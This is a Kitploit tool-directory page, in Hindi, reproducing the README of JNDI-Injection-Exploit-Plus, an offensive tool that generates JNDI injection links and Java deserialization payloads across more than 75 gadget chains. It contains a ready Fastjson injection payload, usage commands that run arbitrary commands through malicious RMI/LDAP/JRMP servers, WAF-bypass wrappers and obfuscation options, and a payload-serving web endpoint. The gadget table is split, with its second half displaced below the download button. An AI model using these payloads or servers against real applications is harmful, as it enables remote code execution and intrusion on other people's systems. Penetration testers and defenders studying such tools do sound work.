Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
JNDI-Injection-Exploit-Plus — कार्यशील JNDI इंजेक्शन लिंक और डीसीरियलाइज़ेशन पेलोड 80+ गैजेट्स के साथ उत्पन्न करता है, जो स्वचालित भेद्यता परीक्षण के लिए RMI, LDAP और HTTP सर्वरों का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/cckuailong/jndi-injection-exploit-plus
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubcckuailong/jndi-injection-exploit-plus

JNDI-Injection-Exploit-Plus

कार्यशील JNDI इंजेक्शन लिंक और डीसीरियलाइज़ेशन पेलोड 80+ गैजेट्स के साथ उत्पन्न करता है, जो स्वचालित भेद्यता परीक्षण के लिए RMI, LDAP और HTTP सर्वरों का समर्थन करता है।

रिपॉजिटरी देखें
88011442 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

JNDI-Injection-Exploit-Plus

中文 README

विवरण

JNDI-Injection-Exploit-Plus एक उपकरण है जो काम करने योग्य JNDI लिंक उत्पन्न करने के लिए है और RMI सर्वर, LDAP सर्वर और HTTP सर्वर शुरू करके पृष्ठभूमि सेवाएँ प्रदान करता है।

इस उपकरण का उपयोग करके आप JNDI लिंक प्राप्त कर सकते हैं, इन लिंक को अपने POC में डालकर भेद्यता का परीक्षण कर सकते हैं।

उदाहरण के लिए, यह एक Fastjson vul-poc है:

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

हम "rmi://127.0.0.1:1099/Object" को JNDI-Injection-Exploit-Plus द्वारा उत्पन्न लिंक से बदलकर भेद्यता का परीक्षण कर सकते हैं।

इसके अलावा, आप JNDI-Injection-Exploit-Plus का उपयोग ysoserial की तरह base64/hex प्रकार के पेलोड उत्पन्न करने के लिए भी कर सकते हैं।

JNDI-Injection-Exploit से अधिक

JNDI-Injection-Exploit एक बेहतरीन उपकरण है, यह इसका प्लस संस्करण है।

और क्या है

1. अधिक JNDI रिमोट रेफरेंस गैजेट: (कुल: 3)

  • JDK 6/7/8 का समर्थन करता है

2. अधिक JNDI लोकल रेफरेंस गैजेट: (कुल: 4)

पेलोडलेखकनिर्भरताएँ
Tomcat 8+ या SpringBoot@welk1ntrustURLCodebase false है लेकिन क्लासपाथ में Tomcat 8+ या SpringBoot 1.2.x+ है
Groovy (GroovyClassLoader)@cckuailongtrustURLCodebase false है लेकिन क्लासपाथ में Tomcat और Groovy है
Groovy (GroovyShell)@cckuailongtrustURLCodebase false है लेकिन क्लासपाथ में Tomcat और Groovy है
Websphere Readfile@cckuailongtrustURLCodebase false है लेकिन क्लासपाथ में WebSphere v6-v9 है

3. डीसीरियलाइज़ेशन गैजेट (कुल: 75)

नोट: ysoserial से अधिक गैजेट (⬆️ ) हैं, और अधिक PR का स्वागत है! ^_^

पेलोडलेखकनिर्भरताएँ
AspectJWeaver@Jangaspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1@pwntester, @cschneider4711bsh:2.0b5
C3P0@mbechlerc3p0:0.9.5.2, mchange-commons-java:0.2.11
C3P0Tomcat@yulegeyutomcat, com.mchange:c3p0:0.9.5.2, com.mchange:mchange-commons-java:0.2.11
Click1@artsploitclick-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure@JackOfMostTradesclojure:1.8.0
Coherence1 ⬆️@cckuailongcoherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
Coherence2 ⬆️@cckuailongcoherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
Coherence3 ⬆️@cckuailongcoherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
Coherence4 ⬆️@cckuailongcoherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Coherence5 ⬆️@cckuailongcoherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Coherence6 ⬆️@cckuailongcoherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
CommonsBeanutils1@frohoffcommons-beanutils:1.9.2
CommonsBeanutils2 ⬆️@cckuailongcommons-beanutils:1.9.2
CommonsCollections1@frohoffcommons-collections:3.1
CommonsCollections1_1 ⬆️@cckuailongcommons-collections:3.1
CommonsCollections2@frohoffcommons-collections4:4.0
CommonsCollections2_1 ⬆️@cckuailongcommons-collections4:4.0
CommonsCollections3@frohoffcommons-collections:3.1
CommonsCollections3_1 ⬆️@cckuailongcommons-collections:3.1
CommonsCollections4@frohoffcommons-collections4:4.0
CommonsCollections5@matthias_kaiser, @jasinnercommons-collections:3.1
CommonsCollections5_1 ⬆️@cckuailongcommons-collections:3.1

4. पेलोड उत्पन्न और निर्यात करें

ysoserial की तरह।

आप डीसीरियलाइज़ेशन पेलोड को Base64 या HEX प्रकार के आउटपुट के साथ उत्पन्न कर सकते हैं

5. रैपर

डीसीरियल डेटा को लपेटने के लिए कुछ रैपर।

रैपरउदाहरण भेद्यताएँ
XstreamCVE-2021-39149
ApereoApereo 4.1 डीसीरियलाइज़ेशन RCE
JbossRemotingJboss रिमोटिंग पोर्ट अनसीरियलाइज़ेशन
Gzipकुछ योन्यू इंटरफ़ेस Gzip का उपयोग करते हैं
DirtyWAF को बायपास करने के लिए बहुत सारा गंदा डेटा डालें
  • उदाहरण
root@kitploit:~
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream

6. फ़्यूज़न

WAF को बायपास करने के लिए क्लास का नाम छिपाएँ।

  • उदाहरण
root@kitploit:~
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F

संदर्भ: https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html

डीसीरियल गैजेट लौटाने के लिए वेब सेवा

root@kitploit:~
java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar
root@kitploit:~
POST /deserial/{Gadget}

cmd={command}&wrapper={wrapper}output={base64/hex}

नोट: पैराम wrapper और output वैकल्पिक हैं।

उपयोग

JNDI लिंक

इस प्रकार चलाएँ

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address]

जहाँ:

  • -C - रिमोट क्लासफ़ाइल में निष्पादित कमांड।

    (वैकल्पिक, डिफ़ॉल्ट कमांड "open /Applications/Calculator.app" है)

  • -A - आपके सर्वर का पता, या तो IP पता या डोमेन।

    (वैकल्पिक, डिफ़ॉल्ट पता पहला नेटवर्क इंटरफ़ेस पता है)

ध्यान देने योग्य बातें:

  • सुनिश्चित करें कि आपके सर्वर के पोर्ट (1099, 1389, 8180) उपलब्ध हैं।

    या आप run.ServerStart क्लास में डिफ़ॉल्ट पोर्ट बदल सकते हैं।

  • आपका कमांड Runtime.getRuntime().exec() को पैरामीटर के रूप में पास किया जाता है,

    इसलिए आपको यह सुनिश्चित करना होगा कि आपका कमांड exec() विधि में काम करने योग्य है।

    "bash -c ...." जैसे bash में कमांड को डबल कोट्स में लपेटने की आवश्यकता है।

डीसीरियलाइज़ेशन पेलोड

इस प्रकार चलाएँ

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]

जहाँ:

  • -C - रिमोट क्लासफ़ाइल में निष्पादित कमांड।

    (वैकल्पिक, डिफ़ॉल्ट कमांड "open /Applications/Calculator.app" है)

  • -D - डीसीरियल गैजेट पेलोड का नाम।

  • -O - (वैकल्पिक) डीसीरियल आउटपुट प्रकार, डिफ़ॉल्ट base64 है

डीसीरियलाइज़ेशन एक्सप्लॉइट

JRMP

  • JRMPListener
root@kitploit:~
java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
  • JRMPClient
root@kitploit:~
java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64

उदाहरण

JNDI लिंक

स्थानीय डेमो:

  1. इस प्रकार टूल प्रारंभ करें:

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    

    स्क्रीनशॉट:

  2. मान लें कि हम चरण 1 में उत्पन्न JNDI लिंक जैसे rmi://ADDRESS/remoteExploit8 को एक भेद्य अनुप्रयोग में इंजेक्ट करते हैं जो JNDI इंजेक्शन द्वारा हमला किया जा सकता है।

    इस उदाहरण में, यह इस तरह दिखता है:

    root@kitploit:~
    class Test{
        public static void main(String[] args) throws Exception{
            InitialContext ctx = new InitialContext();
            ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
        }
    }
    

    फिर जब हम यह कोड चलाते हैं, कमांड निष्पादित हो जाएगा,

    और लॉग शेल में प्रिंट होगा:

अधिक उदाहरणों के लिए: Test-JNDI-Injection-Exploit-Plus

डीसीरियलाइज़ेशन पेलोड

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64

Base64 आउटपुट परिणाम:

स्थापना

हम jar प्राप्त करने के लिए दो विधियों में से एक चुन सकते हैं।

  1. रिलीज़ से नवीनतम jar डाउनलोड करें।

  2. स्रोत कोड को स्थानीय रूप से क्लोन करें और बनाएँ (Java 1.8+ और Maven 3.x+ आवश्यक है)।

    root@kitploit:~
    $ git clone https://github.com/cckuailong/JNDI-Injection-Exploit-Plus.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit-Plus
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

नोट: ‼️ यदि आपको "java.rmi.xxx does not exists" जैसी त्रुटि मिलती है, तो आपको JAVA_HOME पर्यावरण चर सेट करना चाहिए।

अस्वीकरण

सभी जानकारी और कोड केवल शैक्षिक उद्देश्यों और/या आपके स्वयं के सिस्टम की इन भेद्यताओं के परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
CommonsCollections6@matthias_kaisercommons-collections:3.1
CommonsCollections6_1 ⬆️@cckuailongcommons-collections:3.1
CommonsCollections6_2 ⬆️@cckuailongcommons-collections:3.1
CommonsCollections6_3 ⬆️@cckuailongcommons-collections:3.1
CommonsCollections7@scristalli, @hanyrax, @EdoardoVignaticommons-collections:3.1
CommonsCollections7_1 ⬆️@cckuailongcommons-collections:3.1
CommonsCollections8 ⬆️@cckuailongcommons-collections4:4.0
CommonsCollections9 ⬆️@cckuailongcommons-collections:3.2.1
CommonsCollections10 ⬆️@cckuailongcommons-collections:3.2.1
CommonsCollections11 ⬆️@cckuailongcommons-collections:3.1
FileUpload1@mbechlercommons-fileupload:1.3.1, commons-io:2.4
Groovy1@frohoffgroovy:2.3.9
Hibernate1@mbechler
Hibernate2@mbechler
Jackson ⬆️@y4ercom.fasterxml.jackson.core:jackson-databind:2.14.2
JBossInterceptors1@matthias_kaiserjavassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21@frohoff
JRMPClient1@mbechler
JRMPClient2 ⬆️@cckuailong
JRMPClient3 ⬆️@cckuailong
JRMPClient4 ⬆️@cckuailong
JRMPClient5 ⬆️@cckuailong
JRMPClient6 ⬆️@cckuailong
JRMPListener1@cckuailong
JSON1@mbechlerjson-lib🫙jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1@matthias_kaiserjavassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jython1@pwntester, @cschneider4711jython-standalone:2.5.2
MozillaRhino1@matthias_kaiserjs:1.7R2
MozillaRhino2@_tint0js:1.7R2
Myfaces1@mbechler
Myfaces2@mbechler
ROME1@mbechlerrome:1.0
ROME2 ⬆️@firebaskyrome:1.0
Scala1 ⬆️@jarijorg.scala-lang:scala-library:2.13.x
Spring1@frohoffspring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2@mbechlerspring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
Spring3 ⬆️@cckuailongspring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2
URLDNS@geblकेवल jre भेद्यता का पता लगाने के लिए
Vaadin1@kai_ullrichvaadin-server:7.7.14, vaadin-shared:7.7.14
Weblogic1 ⬆️@cckuailongweblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
Weblogic2 ⬆️@cckuailongweblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
Weblogic3 ⬆️@cckuailongcom.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
Weblogic4 ⬆️@cckuailongweblogic.common.internal.WLObjectOutputStream
Weblogic5 ⬆️@cckuailongweblogic:12.2.1.4, coherence
Weblogic6 ⬆️@cckuailongweblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
Weblogic7 ⬆️@cckuailongweblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
Weblogic8 ⬆️@cckuailongweblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
Weblogic9 ⬆️@cckuailongweblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Weblogic10 ⬆️@cckuailongweblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Weblogic11 ⬆️@cckuailongweblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
Wicket1@jacob-baineswicket-util:6.23.0, slf4j-api:1.6.4
WildFly1 ⬆️@hugoworg.wildfly:wildfly-connector:26.0.1.Final